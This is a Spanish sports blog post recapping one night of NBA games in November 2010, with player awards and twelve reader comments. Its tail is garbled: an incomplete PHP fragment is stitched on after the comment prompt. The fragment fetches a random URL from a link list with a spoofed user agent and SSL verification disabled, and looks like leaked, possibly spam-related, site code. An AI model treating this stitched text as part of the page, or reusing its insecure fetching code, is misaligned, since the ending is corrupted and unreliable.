La Crónica (19/11/2010)

20 de November de 2010 por txusma

A lo mejor había alguien que empezaba a dudar de que los Thunder fueran realmente una alternativa en el Oeste. Muchos les daban como mínimo Semifinales de Conferencia pero tampoco habían dejado mejores sensaciones que San Antonio, New Orleans, Utah o Dallas en estos primeros partidos de la temporada. El golpe sobre la mesa que dieron ayer debió retumbar de costa a costa. Se atrevieron a ganar en el mísmisimo Garden de Boston, en un partido duro y trabado, sin Kevin Durant ni Jeff Green (89-84). Apretando los dientes en último cuarto y aguantando las acometidas verdes, liderados por Russell Westbrook se llevaron la victoria en unos últimos 7 minutos agónicos en los que sólo pudieron anotar 6 puntos y desde la línea. Guerra de guerrillas. Territorio en teoría abonado para las victorias célticas.

De todas maneras ninguno de los líderes de la liga aflojó lo más mínimo. New Orleans se deshizo de unos Cavs que no llegaron ni al 35% de acierto en el tiro (101-108). David West y Marco Bellinelli (quien lo diría) fueron demasiado para los ex-compañeros de Lebron, que no vieron aro en ningún momento del partido. Los Lakers también ganaron sin problemas su partido de anoche. Fue ante unos Wolves en que el mejor no fue Kevin Love (simplemente horrible), ni Michael Beasley sino… el serbio Darko Milicic. Primer partido en el que se gana de  verdad todo el salario que cobra. Gasol, Barnes y compañía, salieron concentrados desde el primer minuto y no dieron oportunidades a los jóvenes lobos (112-95). Finalmente, los Spurs se impusieron a unos Jazz en un partido en el que Tim Duncan se convirtió en el jugador de San Antonio que más puntos consigue y que más partidos disputa superando a toda una leyenda como David Robinson. Los Jazz comenzaron flojos pero esta vez no pudieron remontar ante un equipo mucho más duro física y mentalmente que sus anteriores víctimas (94-82). Tony Parker se marcó un partidazo ante Deron Williams en el primer partido tras conocerse su divorcio con la “desesperada” Eva Longoria.

Aparte de los Jazz los otros equipos de Playoffs del Oeste que perdieron anoche fueron los Mavs y los Warriors. Los primeros se vieron superados por los Bulls (88-83), que van encontrando su punto y que empiezan a acechar las primeras posiciones del Este. Dirk Nowitzki se fue a los 36 puntos pero se quedó sólo ante el empuje de Chicago que remontó una diferencia de 12 puntos de la mano de Derrick Rose y Taj Gibson. Y los Warriors cayeron ante otro equipo al que le gusta correr y correr, los Knicks de New York (125-119). Partido típico de los 2 equipos, de mucha velocidad y con alternativas en el marcador. Finalmente la tripleta Felton-Stoudamire-Gallinari se impuso al duo Ellis-Curry. Faltaba David Lee para igualar la ecuación.

En el resto de partido de la jornada victorias de Miami frente Charlotte (87-95), de Toronto contra los Rockets (96-106), de Washington sobre los Memphis (86-89), de Philadelphia contra Milwaukee (79-90) y de Sacramento frente New Jersey (81-86).

PREMIOS

MVP: Los 35 puntos (13 de 17), 5 rebotes, 11 asistencias y 4 robos de Raymond Felton contra los 34 puntos (14 de 20), 11 rebotes y 3 tapones de David West. ¿Con quien os quedáis?

Rookie: El duelo Favors – Cousins se saldó a favor del segundo que consiguió 8 puntos y 10 rebotes. Landry Fields a lo suyo con 9 puntos y 8 rebotes.

Sorpresa: El mejor de los Lakers ayer no fue Kobe, ni Pau, ni Odom sinó Matt Barnes que no falló ninguno de sus tiros a canasta y acabó con 24 puntos a los que sumó 7 rebotes, 6 asistencias y 2 robos. Brutal.

Decepción: 1 de 11 de OJ Mayo para un total de 3 puntos en 30 minutos de juego, y no es la primera vez que le vemos por aquí. El 0 de 7 de Kevin Love también es para destacarlo.

Esfuerzo en vano: Jornada de varios esfuerzos en vano destacados. Por un lado los 23 puntos, 16 rebotes y 5 asistencias de Darko Milicic que nunca se pareció tanto a Pau Gasol. Por otro, los 40 puntos, 5 asistencias y 3 robos de un Monta Ellis que sigue on-fire. Y aún hay que nombrar a Dirk Nowitzki que se fue a los 36 puntos y 8 asistencias. Mala suerte para todos.

Comenta

12 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Hombre, voto por Felton por aquello de que es poco probable que vuelva a estar en esta categoría en todo el año, y ademas al chaval le hace ilusión.

    Tremendo lo de Milicic!

      Citar

  2. nacho dice:
    #2

    Partido serio de Thunder anoche. Pero al final se le apareció la virgen en forma de defensa, y lesión de Rondo. Westbrook tiró por tierra su fenomenal partido con su último cuarto, le pudo todo, jugó mal, tiró mal y tomó malísimas decisiones. Solo un poquito de Celtics y Rondo en pista hubieran bastado, pero… quizá tuvo la suerte de los campeones, pero ya digo, me decepcionó su final y mucho. Tiene que cuajar mucho mucho todavía.

      Citar

  3. HeiNeKeN dice:
    #3

    Me esta sorprendiendo gratamente el rendimiento de Kris Humphries en los Nets, ayer logro un 18-10 y esta manteniendo el nivel que tenia el año pasado cuando llego a los Nets.
    Entre el y Favors estan jugando todos los minutos en el puesto de Ala Pivot y la verdad es que no estan nada mal sus numeros, aunque espero que Favors siga evolucionando poco a poco y al final sea el el titular.

      Citar

  4. sergio dice:
    #4

    Esta madrugada he visto la primera parte del LAL-MIN y el partido completo de UTA-SAS

    Por parte de los californianos, Milicic se comió con patatas a Gasol en esa primera parte. Gasol, mediado el segundo cuarto, creo que tenía una valoración de 0 y Milicic rondaba los 25. Cuando me he despertado y he visto que Pau ha terminado con una valoración de 30 apenas daba credito. Ayer me encantaron Barnes, Odom y Brown. Matt se adapta perfectamente al sistema segun parece, Lamar sigue haciendo de todo bien pasando casi desapercibido, y Brown es todo intensidad. Gasol y Bryant, hasta que pude verlos, muy poco concentrados, especialmente en defensa. A pesar de que Minnesota daba mejores sensaciones individuales que los Lakers, el juego en equipo de los de amarillo fue poco a poco pasandoles por encima.

    En cuanto al otro duelo que vi, los Spurs vuelven a ser el, quizas, mas serio candidato a dar problemas a los de purpura y oro en el Oeste, aun contando con un Duncan a media velocidad (ayer lo vi practico y eficiente mas que intenso). Parker y Jefferson están mucho mas concetrados que el año anterior y el sistema de juego de los texanos sigue dificultando mucho la fluidez del contrario. Curioso que Splitter ayer no gozase de ningun minuto. Es cierto que Blair, McDyess y Bonner parecen estar por encima, pero Jefferson ayer no jugó ni 30 min. hasta ser expulsado por faltas.

    Lo de los Celtics es curioso. Son capaces de ganar dos veces a Miami cuando se concentran, y perder partidos contra unos devaluadisimos Thunder y Cavs. Parece que adoptan la tactica de los campeones en cuanto a intensidad en regular. Juraria que Doc Rivers prefiere rotar bastante a sus jugadores para involucrarlos en el juego por si en algun momento de la temporada tiene que tirar de ellos. No pondre a los Thunder por las nubes ni bajare un peldaño a los verdes por el partido de hoy.

    Por lo demas, me sigue sorprendiendo mucho Felton (mejor temporada hasta ahora que el propio Stoudamire), Westbrook (junto a Raymond, Love y, por supuesto, Millsap los favoritos actuales a MIP), y el efecto balanza de Wade y James. Creo que todavia no han hecho mas de un partido bueno los dos. De Bosh no se ni lo q esperarme

      Citar

  5. sergio dice:
    #5

    Por cierto, que parece que los numeros que ha conseguido Milicic hoy, solo los han conseguido en 25 años, Olajuwon, O’neal y Robinson. Lo metemos en el mismo grupo???

    Vamos, que un partido esterlar lo tiene cualquiera, la rabia es que se lo haga a Gasol. Aunque seguro que Pau duerme tranquilo esta noche con la victoria.

      Citar

  6. LEmontus dice:
    #6

    Wizards sin wall 2-1 tres partidos le han bastado a arenas para ganr lo mismo en wall en 8.

      Citar

  7. HisRoyalAirness dice:
    #7

    En serio Kobe, 8 de VEINTISIETE en media hora?? Eso es tirarse todas las jodidas posesiones (y tirárselas mal). Espero que no empiece otra vez en ese plan

      Citar

  8. scriers dice:
    #8

    Mi voto para Felton también. Un base que no termino de cogerle el tranquillo, pero sobrio, muy sobrio.

      Citar

  9. Denise dice:
    #9

    Tremendo Barnes.
    Deer, debes reconocer que se está comiendo a Artest.

      Citar

  10. TheDeerHunter dice:
    #10

    Vamos a ver Denise…
    Por un lado, tú debes de reconocer que yo siempre defendí el año pasado que los Magic tenían la mejor plantilla del campeonato, y en ese sentido Barnes siempre fue un jugador clave. No lo niego ni lo he negado nunca.
    Por el otro, el rendimiento de Barnes en L.A. no lo podría calificar menos que sobresaliente. Es una evidencia.

    De ahí, a que yo considere a Barnes como un titular tipo de un equipo campeón va un pequeño trecho. En cambio a Artest sí lo considero como tal. Y es por alguna razón.

    En un equipo como Lakers, todo hay que relativizarlo mucho. He visto allí grandes jugadores de regular que se han hundido literalmente en playoffs y han costado campeonatos. En ese sentido, puede ser cierto que Artest ha empezado la campaña peor que Barnes (no tan mal, ojo) pero lo que ha demostrado uno en ciertos ámbitos no lo ha demostrado el otro.Y aún así te digo que prefiero a Barnes lanzando el 95% del tiempo que a Artest… pero el otro tiene algo que Barnes no tiene. Creo que he sido claro.

    Ójala en junio te tenga que reconocer: Sí tío… Barnes ha demostrado mearle 100 veces por encima a Artest, que es mucho mejor jugador ofensivo (que lo es) y tan bueno defensivamente como Artest. De momento, por mucho que demuestre Barnes en regular… le falta mucho para dar a los Lakers lo que Artest les ha dado.

      Citar

  11. Denise dice:
    #11

    TAmpoco estoy diciendo que Barnes sea mejor que Artest, sólo que en este inicio de campaña se lo está comiendo.
    Shannon Brown es 1000 veces peor que Kobe, pero está fisicamente mucho mejor que Kobe y si no fuera por el caché de uno y de otro, le robaría más minutos (ahora mismo, eh). No entiendo que Kobe se esté tirando tantas mandarinas si se ve claramente que no está fisicamente ni al 70%. Quizás se deba a sus ganas de demostrar que quién parte la pana tiene que ser él y no un “blandito” (segun muchos) con barba que si fuera un negro con 50 tatuajes y cara de mala leche estaría endiosado.
    La unica explicación al 8 de 27 es su interés por hacer números. y ese no es un buen camino, y ya debería tener la lección aprendida…

      Citar

  12. alfin dice:
    #12

    tremendo el warriors-knics lo vi y en HD!!!!
    partidazo de felton, destacando tambien a curry, STAT, y tambien monta ellis
    sorpreson milicic y barnes y gran decepcion love despues del 30-30 contra los knicks, tambien lo vi pero no en HD 🙁 🙁

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>